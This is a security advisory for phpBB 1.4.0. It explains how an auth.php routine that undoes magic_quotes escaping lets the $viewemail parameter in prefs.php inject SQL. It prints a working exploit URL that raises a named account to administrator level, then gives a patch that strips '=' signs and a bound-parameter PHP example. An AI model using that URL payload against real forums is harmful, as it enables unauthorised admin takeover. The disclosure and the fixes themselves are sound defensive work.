COMMAND
phpBB
SYSTEMS AFFECTED
phpBB 1.4.0
PROBLEM
'kill-9' found the following. phpBB is an open source bulletin
board created by the phpBB group. Version 1.4.x of phpBB has a
variable input validation problem that can lead to limited
arbitrary SQL queries, including gaining administrative access to
the board.
The problem lies in the fact that phpBB 1.4.x includes an
algorithm in the auth.php file which removes the backslashes that PHP
(with magic_quotes_gpc enabled) automatically adds to GPC (Get/Post/Cookie) variables.
Example code from auth.php:
if(get_magic_quotes_gpc() == 1)
{
    switch($REQUEST_METHOD){
        case "POST":
            while (list ($key, $val) = each ($HTTP_POST_VARS)){
                if( is_array($val) ){
                    array_walk($val, 'stripslashes_array', '');
                    $$key = $val;
                } else {
                    // undoes the escaping magic_quotes added, so the
                    // value reaches the SQL query with raw quotes
                    $$key = stripslashes($val);
                }
            }
            break;
        /* remaining request methods omitted */
    }
}
Therefore, certain PHP variables submitted through a URL can
reach an SQL query with unescaped quotes, which is not good for
security reasons. In the prefs.php file such a situation exists
where a user can execute an arbitrary query by supplying a
certain value for the $viewemail variable.
Example sql query in prefs.php:
$sql = "UPDATE users SET
        user_viewemail = '$viewemail',
        user_theme = '$themes', user_attachsig = '$sig',
        user_desmile = '$smile', user_html = '$dishtml',
        user_bbcode = '$disbbcode', user_lang = '$lang'
        WHERE (user_id = '$userdata[user_id]')";
Example URL that gives the username "l337h4x0r" level 4 (administrative)
privileges on the board:
http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23
SOLUTION
One fix can be found at:
http://www.game-mods.com/prefs.php.txt
Please note there is a slight typo in the file. The correct
lines to add around line 51 in prefs.php are:
// strip '=' from each value so an injected assignment cannot be formed
$fviewemail = str_replace('=','',$viewemail);
$fthemes    = str_replace('=','',$themes);
$fsig       = str_replace('=','',$tsig);
$fsmile     = str_replace('=','',$smile);
$fdishtml   = str_replace('=','',$dishtml);
$fdisbbcode = str_replace('=','',$disbbcode);
$flang      = str_replace('=','',$lang);
$sql = "UPDATE users SET user_viewemail='$fviewemail',
        user_theme='$fthemes', user_attachsig = '$fsig', user_desmile = '$fsmile',
        user_html = '$fdishtml', user_bbcode = '$fdisbbcode', user_lang = '$flang'
        WHERE (user_id = '$userdata[user_id]')";
There may be other bugs in the code in other files that can be
exploited in a similar fashion, but this resolves one immediate
threat. Another user named mmj on the boards mentioned:
"Removing the = signs in all the variables is one solution. Using
addslashes() on all the variables is an alternative solution."
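As an added example (not phpBB's code and not part of the advisory), the prefs.php UPDATE from above rewritten with bound parameters, which keeps request values out of the SQL grammar regardless of magic_quotes or the stripslashes loop in auth.php. It assumes PDO with the SQLite driver and a constructed users table covering only the columns named on this page; the request values are likewise constructed.

```php
<?php
// Added example: the prefs.php UPDATE with placeholders instead of string
// interpolation. The values are sent separately from the statement, so a
// quote, '=' or '#' inside them is stored as data and never parsed as SQL.

function save_prefs_safe(PDO $db, array $p, int $user_id): int {
    $stmt = $db->prepare(
        "UPDATE users SET user_viewemail = :viewemail, user_theme = :themes, "
        . "user_attachsig = :sig, user_desmile = :smile, user_html = :dishtml, "
        . "user_bbcode = :disbbcode, user_lang = :lang WHERE user_id = :uid"
    );
    $stmt->execute([
        ':viewemail' => $p['viewemail'], ':themes'    => $p['themes'],
        ':sig'       => $p['sig'],       ':smile'     => $p['smile'],
        ':dishtml'   => $p['dishtml'],   ':disbbcode' => $p['disbbcode'],
        ':lang'      => $p['lang'],      ':uid'       => $user_id,
    ]);
    return $stmt->rowCount();   // number of rows updated (expected: 1)
}

// Constructed in-memory database (assumption: only the columns used here).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, "
        . "user_level INTEGER, user_viewemail TEXT, user_theme TEXT, "
        . "user_attachsig TEXT, user_desmile TEXT, user_html TEXT, "
        . "user_bbcode TEXT, user_lang TEXT)");
$db->exec("INSERT INTO users (user_id, username, user_level) VALUES (7, 'alice', 1)");

// Constructed request: viewemail carries the quote-and-comment shape from
// the advisory's URL; the other fields are ordinary preference values.
$params = [
    'viewemail' => "1',user_level='4' where username='alice'#",
    'themes' => '1', 'sig' => '0', 'smile' => '0',
    'dishtml' => '0', 'disbbcode' => '0', 'lang' => 'english',
];

save_prefs_safe($db, $params, 7);
$row = $db->query("SELECT user_level, user_viewemail FROM users WHERE user_id = 7")
          ->fetch(PDO::FETCH_ASSOC);
// user_level is still 1; user_viewemail holds the whole string verbatim.
echo "user_level={$row['user_level']} user_viewemail={$row['user_viewemail']}\n";
```

With addslashes() (the alternative mmj mentions) the escaping is only as good as the stripslashes loop leaves it; binding the values sidesteps that interaction entirely.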